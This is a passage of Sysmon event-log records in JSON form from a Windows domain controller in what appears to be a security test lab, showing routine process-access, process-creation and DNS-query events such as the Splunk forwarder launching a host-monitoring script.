07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2137,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2138,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2139,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-001055F70300}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-001055F70300}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2140,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.505\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001044C20200}\r\nProcessId: 2904\r\nQueryName: WIN-DC-6178966\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dfsrs.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.505","ProcessGuid":"{41C8662E-1F73-5F25-0000-001044C20200}","QueryName":"WIN-DC-6178966","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2141,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.552\r\nProcessGuid: {41C8662E-1F78-5F25-0000-0010E8FC0300}\r\nProcessId: 2660\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.552","ProcessGuid":"{41C8662E-1F78-5F25-0000-0010E8FC0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2142,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nTargetProcessId: 2660\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001099DD0300}","TargetProcessId":"2660","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2143,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nTargetProcessId: 2660\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001099DD0300}","TargetProcessId":"2660","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2144,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2145,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2146,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: 